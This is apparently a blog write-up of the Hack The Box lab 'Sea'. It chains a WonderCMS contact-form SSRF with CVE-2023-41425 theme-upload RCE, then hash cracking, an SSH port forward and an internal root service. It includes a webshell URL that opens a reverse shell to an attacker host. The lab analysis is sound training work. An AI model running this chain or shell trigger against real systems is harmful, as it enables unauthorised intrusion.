Myles Nieman
← All writeups

Sea

Overview

Sea is an easy Linux box running a PHP-based WonderCMS site. The contact form makes server-side requests — an SSRF vector — that can be pointed at an attacker-hosted payload. WonderCMS is vulnerable to CVE-2023-41425, an authenticated XSS-to-RCE chain; the SSRF bypasses the authentication requirement, delivering the malicious theme and executing a reverse shell as www-data. A credential hash discovered in the CMS database cracks and reuses to a system user account. That user has access to an internal monitoring application running only on localhost, forwarded via SSH and found to be exploitable for root.

Path: WonderCMS SSRF → CVE-2023-41425 RCE → www-data → CMS hash → user pivot → internal service → root.

Enumeration

The scan shows SSH on 22 and a web server on 80. The site is PHP-backed.

Initial recon showing the Sea website running on PHP

Browsing the site reveals a mostly static page with a contact form as the key interactive surface:

The Sea website contact/wave participation form

Testing the contact form shows it makes outbound server-side requests — an SSRF primitive. Submitting a URL pointing to a local listener gets a callback:

The contact form field that accepts a URL for SSRF

Confirming the SSRF callback is received from the server

Probing the application further turns up a /loginURL redirect and a login endpoint:

A login page for the WonderCMS admin panel

WonderCMS login confirmation

The theme and page structure identify the CMS as WonderCMS by turboblack.

Page source or headers identifying WonderCMS

Foothold — CVE-2023-41425 via SSRF

WonderCMS is vulnerable to CVE-2023-41425 — an authenticated theme-upload XSS that achieves RCE by installing a malicious ZIP as a theme. The exploit script from prodigiousMind/CVE-2023-41425 automates the payload. Ordinarily this requires a logged-in admin session, but the contact form SSRF means the server itself — already authenticated as admin — will fetch and trigger the payload:

I generated the exploit payload and hosted it, then submitted the exploit URL into the contact form’s URL field, letting the server-side request deliver it:

The exploit URL being submitted via the contact form SSRF

The server fetches the payload, installs the malicious theme, and executes it:

Reverse shell received from the WonderCMS exploit

With a shell as www-data, the installed theme’s reverse-shell handler is accessible directly:

http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.14.41&lport=443

Triggering the uploaded webshell to get a persistent shell

User

Enumerating the filesystem from the www-data shell turns up a database file containing a password hash:

The WonderCMS database file containing a bcrypt password hash

Password hash extracted from the CMS database

Checking /home reveals the system users:

/home directory showing user accounts on the box

Cracking the hash offline returns a plaintext password that reuses to one of the system accounts, giving SSH access and the user flag:

Cracked hash and successful SSH login as the user

User flag retrieved

Privilege Escalation — Internal Service

From the user session, ss -tlnp or a process listing reveals an internal web service bound only to localhost:8000:

Internal service listening on localhost:8000

Forwarding the port locally over SSH to examine it:

$ ssh -L 8000:localhost:8000 <user>@sea.htb

SSH local port forward command to expose the internal service

The forwarded service presents a monitoring or analytics web interface:

The internal monitoring application accessible via port forward

After analysis, the service is found to be running as root and accepts input that can be abused for command execution:

Identifying the exploitable input in the internal application

Root

Exploiting the internal service’s vulnerability yields code execution as root:

Root shell obtained via the internal service exploit

Takeaways

  • SSRF can substitute for authentication. When the vulnerable server fetches URLs on behalf of the requester, it carries its own session cookies — turning a “requires login” exploit into an unauthenticated one.
  • CVE-2023-41425 is a theme-upload RCE in WonderCMS that is trivially weaponized; any internet-exposed WonderCMS admin panel (or SSRF path to one) should be treated as a full compromise vector.